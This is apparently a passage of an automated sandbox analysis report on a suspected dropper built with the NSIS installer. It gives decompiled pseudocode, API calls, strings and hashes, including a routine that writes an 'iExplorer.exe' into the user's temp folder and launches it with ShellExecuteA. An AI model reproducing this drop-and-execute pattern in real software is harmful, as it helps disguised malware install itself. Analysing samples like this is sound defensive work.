                                                                      				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                                      				__eflags = _t83 - _t75;
                                                                      				if(_t83 >= _t75) {
                                                                      					goto L31;
                                                                      				} else {
                                                                      					__eflags = _t83 - 0xfffffffe;
                                                                      					if(_t83 != 0xfffffffe) {
                                                                      						E004059C6(_t75, 0x409be8, _t83, 0x409be8, 0xffffffee);
                                                                      					} else {
                                                                      						E004059C6(_t75, 0x409be8, _t83, 0x409be8, 0xffffffe9);
                                                                      						lstrcatA(0x409be8,  *(_t85 - 0x34));
                                                                      					}
                                                                      					_push(0x200010);
                                                                      					_push(0x409be8);
                                                                      					E0040529A();
                                                                      					goto L29;
                                                                      				}
                                                                      				goto L33;
                                                                       			}

                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,00409BE8,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017D8
                                                                      • CompareFileTime.KERNEL32(-00000014,?,00409BE8,00409BE8,00000000,00000000,00409BE8,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401802
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\iExplorer.exe, xrefs: 00401866, 00401882
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 004017C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 1941528284-812238309
                                                                      • Opcode ID: a11c56c3c592b783d421f95db97442dc0429df85a07f9da074d3c2c1c021b9ae
                                                                      • Instruction ID: 9a4fdeb023e1cce58347ffb01979746b71cf519e037fe7f86bffddf8920b1442
                                                                      • Opcode Fuzzy Hash: a11c56c3c592b783d421f95db97442dc0429df85a07f9da074d3c2c1c021b9ae
                                                                      • Instruction Fuzzy Hash: 3341C2B1900605BACB10BBA5CD86EBF36B8EF45368F20423FF515F11E2D67C49419A6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                      				struct _SECURITY_ATTRIBUTES** _t10;
                                                                      				int _t19;
                                                                      				struct _SECURITY_ATTRIBUTES* _t20;
                                                                      				signed char _t22;
                                                                      				struct _SECURITY_ATTRIBUTES* _t23;
                                                                      				CHAR* _t25;
                                                                      				struct _SECURITY_ATTRIBUTES** _t29;
                                                                      				void* _t30;
                                                                      
                                                                      				_t23 = __ebx;
                                                                      				_t25 = E00402A9D(0xfffffff0);
                                                                      				_t10 = E00405530(_t25);
                                                                      				_t27 = _t10;
                                                                      				if(_t10 != __ebx) {
                                                                      					do {
                                                                      						_t29 = E004054C8(_t27, 0x5c);
                                                                      						 *_t29 = _t23;
                                                                      						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                      						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                      						if(_t19 == 0) {
                                                                      							if(GetLastError() != 0xb7) {
                                                                      								L4:
                                                                      								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                      							} else {
                                                                      								_t22 = GetFileAttributesA(_t25); // executed
                                                                      								if((_t22 & 0x00000010) == 0) {
                                                                      									goto L4;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                      						 *_t29 = _t20;
                                                                      						_t27 =  &(_t29[0]);
                                                                      					} while (_t20 != _t23);
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                      					_push(0xfffffff5);
                                                                      					E00401428();
                                                                      				} else {
                                                                      					E00401428(0xffffffe6);
                                                                      					E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                                                                      					SetCurrentDirectoryA(_t25); // executed
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t30 - 4));
                                                                      				return 0;
                                                                       			}

                                                                      APIs
                                                                        • Part of subcall function 00405530: CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405543
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405552
                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 00401607
                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401615
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401644
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401639
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 3751793516-501415292
                                                                      • Opcode ID: b762a436582f82718d4be78d21757351f54e2f7883bf03ea5df1b6f0ae605340
                                                                      • Instruction ID: 18532858663da7651fa01770c3867fcb30c5352428bd71f74b4ac357e1daad2c
                                                                      • Opcode Fuzzy Hash: b762a436582f82718d4be78d21757351f54e2f7883bf03ea5df1b6f0ae605340
                                                                      • Instruction Fuzzy Hash: 5D012631908140AFDB203B755C089BF3BB49A62324B64063FF591B22E2C63C0C42863E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 66%
                                                                      			E00401E2E() {
                                                                      				signed int _t7;
                                                                      				void* _t16;
                                                                      				void* _t19;
                                                                      				char* _t20;
                                                                      				signed int _t24;
                                                                      				void* _t26;
                                                                      
                                                                      				_t24 = E00402A9D(_t19);
                                                                      				_t20 = E00402A9D(0x31);
                                                                      				_t7 = E00402A9D(0x22);
                                                                      				_push(_t20);
                                                                      				_push(_t24);
                                                                      				_t22 = _t7;
                                                                      				wsprintfA(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", "%s %s");
                                                                      				E00401428(0xffffffec);
                                                                      				asm("sbb eax, eax");
                                                                      				asm("sbb eax, eax");
                                                                      				_t16 = ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)); // executed
                                                                      				if(_t16 < 0x21) {
                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t26 - 4));
                                                                      				return 0;
                                                                       			}

                                                                      APIs
                                                                      • wsprintfA.USER32 ref: 00401E54
                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E82
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\iExplorer.exe, xrefs: 00401E4D
                                                                      • %s %s, xrefs: 00401E48
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401E6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                       • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ExecuteShellwsprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$%s %s$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 2956387742-1807069092
                                                                      • Opcode ID: b26806dd868fd31dbe9ea857f092dc66767f0ed3d4980ef1dee11b6a6368928c
                                                                      • Instruction ID: f3193567471f81abcd740d58208af08b0de0ff12a2708d7f36330ac78fb70cd5
                                                                      • Opcode Fuzzy Hash: b26806dd868fd31dbe9ea857f092dc66767f0ed3d4980ef1dee11b6a6368928c
                                                                      • Instruction Fuzzy Hash: 4AF0F471B04200AAC711BBB58D4AEAE7BA8DB01318F600836F500F61D2D5BD88919B2C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004056AF(CHAR* _a4, intOrPtr _a6, CHAR* _a8) {
                                                                      				signed int _t11;
                                                                      				int _t14;
                                                                      				signed int _t16;
                                                                      				void* _t19;
                                                                      				CHAR* _t20;
                                                                      				CHAR* _t7;
                                                                      
                                                                      				_t20 = _a4; // output buffer for the generated temp file name
                                                                      				_t19 = 0x64; // up to 100 attempts
                                                                      				while(1) {
                                                                      					_t19 = _t19 - 1;
                                                                      					_a4 = 0x61736e; // prefix bytes "nsa\0" (little-endian)
                                                                      					_t11 = GetTickCount();
                                                                      					_t16 = 0x1a;
                                                                      					_t7 =  &_a4; // 0x61736e
                                                                      					_a6 = _a6 + _t11 % _t16; // varies the third prefix character: 'a' + (tick count % 26)
                                                                      					_t14 = GetTempFileNameA(_a8, _t7, 0, _t20); // executed: unique ns?xxxx.tmp name inside directory _a8
                                                                      					if(_t14 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(_t19 != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					 *_t20 =  *_t20 & 0x00000000; // every attempt failed: hand back an empty name
                                                                      					return _t14;
                                                                      				}
                                                                      				return _t20;
                                                                      			}

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004056C2
                                                                      • GetTempFileNameA.KERNELBASE(?,nsa,00000000,?,?,0040315B,1033,C:\Users\user\AppData\Local\Temp\), ref: 004056DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-1968954121
                                                                      • Opcode ID: 100b786fea9b69b0c64bd6a5d02a0e05a653c47ba9cf0ef0a75673cc49223ef6
                                                                      • Instruction ID: ba2bb07d6120f6483de45d65fc9f3b2ab4f8e9ae98c49aa38cd1930b2257a5d0
                                                                      • Opcode Fuzzy Hash: 100b786fea9b69b0c64bd6a5d02a0e05a653c47ba9cf0ef0a75673cc49223ef6
                                                                      • Instruction Fuzzy Hash: 73F0273230820476D7104E55EC04BDB3F59DF81710F14C02BFA089A2C0D2B199888795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E00403129(void* __eflags) {
                                                                      				void* _t2;
                                                                      				void* _t5;
                                                                      				CHAR* _t6;
                                                                      
                                                                      				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\"; // temp directory path as recovered from the memory dump
                                                                      				E00405BD3(_t6); // path clean-up (CharNextA/CharPrevA walk, see the subcall APIs below)
                                                                      				_t2 = E00405509(_t6); // a zero result aborts without creating anything
                                                                      				if(_t2 != 0) {
                                                                      					E0040549D(_t6);
                                                                      					CreateDirectoryA(_t6, 0); // executed: make sure the temp directory exists
                                                                      					_t5 = E004056AF("1033", _t6); // executed: obtain a unique temp file name inside it
                                                                      					return _t5;
                                                                      				} else {
                                                                      					return _t2;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                        • Part of subcall function 00405BD3: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 0040314A
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $1033$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 4115351271-698324253
                                                                      • Opcode ID: c3f0b50ca7e5aa46a39d7f63eb6a98f00048d29d84a35505853ea38226ff5a62
                                                                      • Instruction ID: a8723a087280c40a16d5c21e5dc8d7b0d0cf519ea70ea930135e230a4f3188f7
                                                                      • Opcode Fuzzy Hash: c3f0b50ca7e5aa46a39d7f63eb6a98f00048d29d84a35505853ea38226ff5a62
                                                                      • Instruction Fuzzy Hash: 04D09E1150693131C55136263D06FCF255D8F56719F11A477F509B5086966C168249EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E0040136D(signed int _a4) {
                                                                      				intOrPtr* _t8;
                                                                      				int _t10;
                                                                      				signed int _t12;
                                                                      				int _t13;
                                                                      				int _t14;
                                                                      				signed int _t21;
                                                                      				int _t24;
                                                                      				signed int _t27;
                                                                      				void* _t28; // frame/context pointer the decompiler did not recover
                                                                      
                                                                      				_t27 = _a4; // index of the first entry to run
                                                                      				while(_t27 >= 0) {
                                                                      					_t8 = _t27 * 0x1c +  *0x42f050; // entry table at *0x42f050, 0x1c bytes per entry
                                                                      					__eflags =  *_t8 - 1;
                                                                      					if( *_t8 == 1) { // entry type 1 ends the run
                                                                      						break;
                                                                      					}
                                                                      					_push(_t8); // executed
                                                                      					_t10 = E00401439(); // executed: run the current entry
                                                                      					__eflags = _t10 - 0x7fffffff;
                                                                      					if(_t10 == 0x7fffffff) { // abort code, propagated to the caller
                                                                      						return 0x7fffffff;
                                                                      					}
                                                                      					__eflags = _t10;
                                                                      					if(__eflags < 0) {
                                                                      						_t10 = E0040591B(0x430000 - (_t10 + 1 << 0xa), 0x430000); // negative result is mapped through E0040591B first
                                                                      						__eflags = _t10;
                                                                      					}
                                                                      					if(__eflags != 0) {
                                                                      						_t12 = _t10 - 1; // non-zero result: continue at entry (_t10 - 1)
                                                                      						_t21 = _t27;
                                                                      						_t27 = _t12;
                                                                      						_t13 = _t12 - _t21; // distance moved, used for the progress update
                                                                      						__eflags = _t13;
                                                                      					} else {
                                                                      						_t13 = 1; // zero result: advance to the next entry
                                                                      						_t27 = _t27 + 1;
                                                                      					}
                                                                      					__eflags =  *(_t28 + 0xc);
                                                                      					if( *(_t28 + 0xc) != 0) {
                                                                      						 *0x42e80c =  *0x42e80c + _t13; // progress position
                                                                      						_t14 =  *0x42e7f4; // progress total
                                                                      						__eflags = _t14;
                                                                      						_t24 = (0 | _t14 == 0x00000000) + _t14; // guards against a zero total
                                                                      						__eflags = _t24;
                                                                      						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x42e80c, 0x7530, _t24), 0); // 0x402 = PBM_SETPOS, position scaled to a 30000 range
                                                                      					}
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1729cea53919bd31031296921bac9774217656d22c0054ed41b4153266e7cca5
                                                                      • Instruction ID: 80bb869abca085a0be992480c15044adf3d804e6883710456eb6c92533d47cb1
                                                                      • Opcode Fuzzy Hash: 1729cea53919bd31031296921bac9774217656d22c0054ed41b4153266e7cca5
                                                                      • Instruction Fuzzy Hash: 1501DE727242109FE7185B3ADD09B3B26D8E714314F40423EB952E66F0F6B8DC028B49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E00405680(CHAR* _a4, long _a8, long _a12) {
                                                                      				signed int _t5;
                                                                      				void* _t6;
                                                                      
                                                                      				_t5 = GetFileAttributesA(_a4); // executed
                                                                      				asm("sbb ecx, ecx"); // builds the attribute mask from the result above
                                                                      				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed: share mode FILE_SHARE_READ; existing attributes are reused, 0 when GetFileAttributesA failed
                                                                      				return _t6;
                                                                      			}

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402C7B,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00405684
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,?,004032C5,?), ref: 004056A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: a6786bdd1ecadf4d2098af02dba405870ce5b222e9fe0f941bd3e831565b58f7
                                                                      • Instruction ID: b7b74c543409fdeb8301fbc9ebf3be8aa86158980b04ac487dfcd649bd9e914c
                                                                      • Opcode Fuzzy Hash: a6786bdd1ecadf4d2098af02dba405870ce5b222e9fe0f941bd3e831565b58f7
                                                                      • Instruction Fuzzy Hash: E6D09E71658301EFEF098F20DE16F2EBBA2EB84B01F10962CBA52940E0D6715C15DB16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004030E0(void* _a4, long _a8) {
                                                                      				int _t6;
                                                                      				long _t10;
                                                                      
                                                                      				_t10 = _a8; // requested byte count
                                                                      				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed: reads from the global file handle stored at 0x409020
                                                                      				if(_t6 == 0 || _a8 != _t10) { // failure or short read
                                                                      					return 0;
                                                                      				} else {
                                                                      					return 1;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F03,000000FF,00000004,00000000,00000000,00000000), ref: 004030F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 97d6d247004f29e9d78521b63fa2a9ba5f4855e938e88fb08e6db57a9883ace6
                                                                      • Instruction ID: e963f8e1892cb687997461210a543dd6021012ac376dcca7a2fa4431a532cc29
                                                                      • Opcode Fuzzy Hash: 97d6d247004f29e9d78521b63fa2a9ba5f4855e938e88fb08e6db57a9883ace6
                                                                      • Instruction Fuzzy Hash: D4E0EC32554129BBDF115FA19C04EAB3F6CEB097A2F00C032FA55E9290D275EA11DBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00403112(long _a4) {
                                                                      				long _t2;
                                                                      
                                                                      				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                                      				return _t2;
                                                                      			}





                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E3B,?,?,?,?,?,?,?,004032C5,?), ref: 00403120
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                      • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                      • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                      • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00403509() {
                                                                      				void* _t1;
                                                                      				void* _t4;
                                                                      				signed int _t6;
                                                                      
                                                                      				_t1 =  *0x409020; // 0xffffffff
                                                                      				if(_t1 != 0xffffffff) {
                                                                      					CloseHandle(_t1);
                                                                      					 *0x409020 =  *0x409020 | 0xffffffff;
                                                                      					_t6 =  *0x409020;
                                                                      				}
                                                                      				return E004052DC(_t4, _t6, 0x436800, 7);
                                                                      			}







                                                                      APIs
                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00403333,?), ref: 00403514
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 011c69f3543b3670a0a5f0c1309755843e10ba62a0cb865796c18c35e759391d
                                                                      • Instruction ID: 515abea7777c0a29096e9a6c7b2f3eff04a411698ae5f4ec9479bb3011aad0a9
                                                                      • Opcode Fuzzy Hash: 011c69f3543b3670a0a5f0c1309755843e10ba62a0cb865796c18c35e759391d
                                                                      • Instruction Fuzzy Hash: 92C08C30D08B01BAC518AB789E4AB1A3AB4BB09331FA00B65F0B1F01F1C77C5D01C92E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 93%
                                                                      			E004046B8(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                      				struct HWND__* _v8;
                                                                      				struct HWND__* _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				void* _v24;
                                                                      				long _v28;
                                                                      				int _v32;
                                                                      				signed int _v40;
                                                                      				int _v44;
                                                                      				signed int* _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				long _v68;
